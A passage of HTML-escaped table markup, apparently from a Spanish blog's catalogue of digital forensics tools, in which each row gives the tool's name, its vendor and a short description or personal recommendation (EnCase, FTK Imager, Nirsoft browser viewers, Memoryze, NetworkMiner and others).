center;"&gt;Nirsoft&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Lee los ficheros de la cache de Google Chrome y visualiza en una lista lo que se encuentra almacenado.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.digital-detective.co.uk/downloads.asp" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;DCode&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Digital Detective&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Convierte varios tipos de fechas y tiempos. Me ha venido bien para los distintos formatos en Unix.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://sourceforge.net/projects/defraser/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Defraser&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Varios&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Detecta ficheros multimedia en espacios 'unallocated'.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.digital-forensic.org/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Digital Forensics Framework&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;ArxSys&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Framework que permite el análisis de volumenes, sistemas de ficheros, aplicaciones de usuario, extracción de metadatos, ficheros borrados y ocultos.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.moonsols.com/ressources/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;DumpIt&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;MoonSols&lt;/td&gt;&lt;td class="s3"&gt;Realiza un volcado de la memoria a fichero. Funciona en 32 y 64 y se puede ejecutar desde un USB&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;&lt;a href="http://www.nucleustechnologies.com/download-exchange-edb-viewer.php" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;EDB Viewe&lt;/span&gt;&lt;/a&gt;r&lt;/span&gt;&lt;/td&gt;&lt;td class="s3"&gt;Lepide Software&lt;/td&gt;&lt;td class="s3"&gt;Visualiza (pero no exporta) ficheros Outlook sin utilizar Exchange Server.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.guidancesoftware.com/forensic.htm"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;EnCase&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Guidance&lt;/td&gt;&lt;td class="s3"&gt;Potente herramienta y la mejor de su especie. De reconocido prestigio internacional. Vale para todo en el ámbito forense. Económicamente muy elevada pero muy recomendable. La suelo utilizar&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.jadsoftware.com/go/?page_id=167" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Encrypted Disk Detector&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;JAD&lt;br /&gt;software&lt;/td&gt;&lt;td class="s3"&gt;Comprueba discos físicos en busca  de ficheros o volumenes cifrados con TrueCrypt, PGP, o Bitlocker.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.takenet.or.jp/~ryuuji/minisoft/exifread/english/download.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Exif Reader&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Ryuuji Yoshimoto&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae datos(metadatos) Exif de fotografias digitales.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://ipmsg.org/tools/fastcopy.html.en" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;FastCopy&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Shirouzu Hiroaki&lt;/td&gt;&lt;td class="s3"&gt;Uno de los mas rapidos en copiar y/o borrar, permite utilizar&lt;br /&gt;&lt;br /&gt;SHA-1. Lo he utilizado para copia masiva de datos con muy buenos resultados&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;FAT32 Format&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Ridgecrop&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Habilita la capacidad de almacenamiento de discos formateados en FAT32&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.informatica64.com/herramientas.aspx"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Foca&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;div style="text-align: left;"&gt;Informatica64&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;Herramienta para fingerprinting e information gathering en trabajos de auditoría web. Lo utilizo para casi todo, especialmente el tema de metadatos&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Forensic Image Viewer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Sanderson Forensics&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Visor de varios formatos con posibilidad de extraer metadatos Exif o datos de geolocalización GPS. Lo suelo emplear bastante.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.woanware.co.uk/?page_id=42" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;ForensicUserInfo&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Woanware&lt;/td&gt;&lt;td class="s3"&gt;Extrae información relacionada con los usuarios en Windows utilizando  los ficheros SAM, SOFTWARE y  SYSTEM hives también desencripta hashes LM/NT.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://forensic-software.co.uk/default.aspx" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;FoxAnalysis&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;forensic-software&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Herramienta que permite el análisis del historico de internet de firefox.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://accessdata.com/support/adownloads" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;FTK&lt;/span&gt;&lt;/a&gt;&lt;a href="http://accessdata.com/support/adownloads" style="color: black;" target="_blank"&gt; &lt;/a&gt;&lt;a href="http://accessdata.com/support/adownloads" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Imager&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;AccessData&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Herramienta para adquirir, montar y analizar de forma básica imágenes de equipos. También es capaz de volcar la memoria a fichero. Muy completa &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.woanware.co.uk/?page_id=115" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Gmail Parser&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Woanware&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Obtiene de ficheros HTML información que se ha 'cacheado' al utilizar 'artefactos' de Gmail&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/hash_my_files.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;HashMyFiles&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Calcula hashes MD5 y SHA.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.mandiant.com/products/free_software/highlighter/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Highlighter&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Mandiant&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Examina ficheros log usando texto, gráficos o histogramas.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/ie_cache_viewer.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;IECacheView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Lee los ficheros de la cache de Internet Explorer y lo visualiza en una lista.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/iecookies.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;IECookiesView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae detalles de las cookies de Internet Explorer.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/iehv.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;IEHistoryView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae las visitas recientes de las URL's de  Internet Explorer.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/internet_explorer_password.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;IEPassView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae las passwords de Internet Explorer en las versiones 4 a 8.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;KaZAlyser&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Sanderson Forensics&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae información del famoso programa P2P KAZA.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://liveview.sourceforge.net/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Live View&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;CERT&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Permite al analista examinar y 'arrancar' imagenes en formato dd y VMware. También muy útil&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/live_messenger_contacts.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;LiveContactsView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Visor que permite exportar los contactos y otros detalles de  Windows Live Messenger.&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.mitec.cz/mailview.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Mail Viewer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;MiTeC&lt;/td&gt;&lt;td class="s3"&gt;Maravilloso visor de Outlook Express, Windows Mail, Windows Live Mail, Mozilla Thunderbird y ficheros basados en ficheros EML.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.mandiant.com/products/free_software/memoryze/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Memoryze&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Mandiant&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Adquiere y analiza imagenes RAM. Lo bueno es que permite analizar el fichero pagefile en sistemas vivos. Es algo engorroso, pero me encanta.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MFTview&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Sanderson Forensics&lt;/td&gt;&lt;td class="s3"&gt;Muestra y decodifica contenidos extraídos en ficheros MTF.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 59px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://mobalivecd-en.mobatek.net/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MobaLiveCD&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Mobatek&lt;/td&gt;&lt;td class="s3"&gt;Ejecuta un ISO linux desde windows sin tener que reiniciar. Basado en QEMU. Me ha venido bien en alguna ocasión para utilizar servidores FTP sin tener que tocar windows.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.mobiledit.com/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MobilEdit&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;MobilEdit&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;Recoge todos los datos posibles desde el teléfono móvil, a continuación, genera un amplio informe que se puede almacenar o imprimir. Soporta la mayoría de los móviles.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Motorola Tools&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;"Flash &amp;amp; Backup" - actualiza el firmware y "M-Explorer" - administrador de archivos pequeños, fáciles de usar y gratis&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/mozilla_cache_viewer.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MozillaCacheView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Nirsoft&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Lee los ficheros de la cache de Mozilla y visualiza en una lista lo que se encuentra almacenado.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/mzcv.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MozillaCookieView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Nirsoft&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae detalles de las cookies de Mozilla.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/mozilla_history_view.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MozillaHistoryView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&amp;nbsp;Nirsoft&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Herramienta que permite el análisis del historico de internet de Mozilla.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.nirsoft.net/utils/my_last_search.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;MyLastSearch&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Extrae búsquedas utilizadas en los buscadores mas populares (Google, Yahoo y MSN) también en redes sociales (Twitter, Facebook, MySpace)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 17px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s6"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Netdetector&lt;/span&gt;&lt;/td&gt;&lt;td class="s7"&gt;&lt;br /&gt;&lt;br /&gt;Niksun&lt;/td&gt;&lt;td class="s7"&gt;&lt;br /&gt;&lt;br /&gt;Analizador de red y detector de intrusiones&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.netwitness.com/products-services/investigator-freeware" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Netwitness Investigator&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Netwitness&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Analizador de paquetes de red. Increíblemente bueno. &lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s8"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;NetworkMiner&lt;/span&gt;&lt;/td&gt;&lt;td class="s4"&gt;Netresec&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;Programa de captura con el fin de detectar los sistemas operativos, las sesiones, los nombres de host, Puertos abiertos, etc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://notepad-plus-plus.org/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Notepad ++&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Notepad ++&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Ya jamas volveré al notepad clásico después de utilizar este Notepad.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/opera_cache_view.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;OperaCacheView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Lee los ficheros de la cache de Opera y visualiza en una lista lo que se encuentra almacenado.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 30px;"&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/opera_password_recovery.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;OperaPassView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Nirsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;Desencripta las password  del fichero 'wand.dat' de Opera.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;a href="http://www.oxygensoftware.com/es/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Oxygen&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;Oxygen&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;Maravillosa herramienta comercial analiza todos los datos disponibles de un móvil. No puedo vivir si ella.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.paraben.com/p2-explorer.html" target="_blank"&gt;&lt;span 